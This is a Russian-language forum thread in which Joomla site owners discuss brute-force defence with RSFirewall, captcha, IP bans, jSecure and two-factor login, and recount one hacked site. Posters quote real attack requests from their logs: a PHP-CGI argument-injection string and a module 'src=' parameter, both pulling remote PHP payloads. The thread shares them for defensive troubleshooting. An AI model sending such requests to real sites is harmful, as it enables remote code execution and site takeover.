Вирусы, Шеллы, редиректы итд

Работает это так
Вы поставили в настройках включение капчи после 3 неудачных попыток входа. И блокировка после 5 неудачных.
Итак... Посетитель или робот заходят первый раз, вводят с ошибкой и бац +1 к неверному паролю.
Второй раз, +1 к неверному паролю
3 раз +1 к неверному паролю.
Включается капча и тут уже на уровне капчи человека не пускает проверить имя и пароль. Т.е. нет проверки имени и пароля, так как блокирует капча. Так как капчу скорей всего тоже неверно ввели.
Вот и получается что все эти неверные попытки могут плюсоваться. 5-6 попыток - это нормально и не страшно. пусть себе пытаются, защита хорошо срабатывает. А 99% попыток взлома, делается роботами.
Им пофиг, они могут месяцами долбиться, пока их хозяин не уберёт ваш сайт из списка ПОД СНОС.
Сидит какой-нибудь хрен. Берёт список вновь купленных доменов.
И запускает программу долбилку (перебор паролей) на все эти сайты новые. Так как на новом сайте редко защита есть.
И таких сайтов в списке для атаки у этих гадов тысячи. В 99,999% ваш сайт ломают не конкуренты, а какие-нибудь хакеры из индии, занзибара и т.д.
Для того чтобы полностью сломать или напихать рекламы или чтобы потом деньги вымогать за починку.
Так что не паникуйте

Да Мой IP в белом списке. Я имею ввиду блокировка автоматическая, если например несколько раз ввели не верный лог и пароль к административной части. это позволяет с подбором пароля бороться.
webstudia Несколько дней мониторила - теперь лишь пара страниц. Значит все таки работает ))
Меня уже пытались и wordpress - овской ссылкой взломать. Вот людям покоя нет ))
Домену кстати 4 года моему

а что такое isp?

http://g.zeos.in/?q=ispmanager что это

А у меня вот такие еще новости по ссылке http://домен.ru/?-d allow_url_inclu...e=http://onlinedieta.hop.ru/images/image2.txt
Ответ Firewall : Remote file inclusion attempted.
Debug information
URI: -d_allow_url_include=1_-d_auto_prepend_file=http://onlinedieta_hop_ru/images/image2_txt=
Match: =http://onlinedieta_hop_ru/images/image2_txt=

Я ничего не понял, все ссылки не пашут. Да и не могут.

Так я не про то. Видимо пытаются картинку с вирусов или скриптом каким то закинуть. по первой ссылке http://Мой-домен.ru/?-d allow_url_include=1 -d auto_prepend_file=http://onlinedieta.hop.ru/images/image2.txt
Просто интересно что это за муть. Кто нибудь сталкивался с подобным?

Это один из тысячи способов взлома сайтов. Не думайте об этом. Оно вам не надо, RSFirewall с ними сам справляется.
Советую в настройках компонента, настроить так уведомления, чтоб не посылал СРЕДНИЕ. А то закалибает письмами

У меня в основном сайты на joomla ломали через SQL инъекцию. С третье веткой вроде такого пока не наблюдается.

Доктор Айболит показал мне время ожидания проверки 8 часов. Почувствовал себя работающим на "динозавре" ...
Ещё можно проверять онлайн сервисом http://seculine.ru/virustestonline , особенно для успокоения клиентов )))
Сам уже давно проверяю вручную через Тотал Командер
Полезный раздел, благодарю

Турки, вчера взломали сайт уже второй раз. Joomla 3

Причем при взломе удаляли все файлы сайта и оставляли свою заглушку index.php

Просмотрев все детально в error_log увидел, что было куча попыток подбора паролей в админку.

Задумался.... стоял RSFirewall, пароль был сложный, логин также не admin

(Правда надо отметить что в журнал RSFirewall не заглядывал, там уже очень давно отражалось что турки ведут подбор пароля)

Так как же они смогли подобрать пароль?

Очень просто, оказывается я при покупке шаблона установил quick start и не заметил что там был demo пользователь

Его они и подобрали!

Теперь использую такую связку:
jSecure Authentication
+ Двухфакторная аутентификация (стандартный плагин joomla)

jSecure Authentication использую уже давно на всех сайтах клиента. Подбор пароля с ним не грозит.

RSFirewall - все переборы паролей фиксирует и может банить. Ну там ещё куча всяких защитных примочек.
Можно в настройках выставить как я делаю всегда:
Максимум 5 попыток ввода пароля
После 3й попытки включается каптча
После 5го раза банит по IP.
И тут любая падла с перебором будет нюхать писю
И никакие jSecure не нужны.

Все таки jSecure лучше бы поставить, хотя бы для того чтобы всякие юные хакары не баловались. А то набирают пароли 12345, 1qaz и прочие, нефиг ерундой заниматься )).

С RSFirewall этой фигни не надо. Зачем самому себе и клиенту геморрой добавлять в виде замудрёных ссылок на админку.
RSFIrewall - банит всех негодяев и не нужно извращаться. начался перебор, хлоп он в бане по IP.
В нём можно банить целые страны. Галочки поставил и всё, иностранцы не могут открыть сайт.

На вкус и цвет... Я лично ставлю на каждый свой сайт, не люблю когда пароли подбирают, не даю возможности.

admin
12345

Уже не первый раз на мой сайт идут вот такие запросы modules/mod_raxo_allmode/tools/tb.php?src=http://picasa.com.sikaram.lk/hatz.php Я в этом мало понимаю но что-то мне подсказывает что в модуле raxo (я его не использую) есть дыра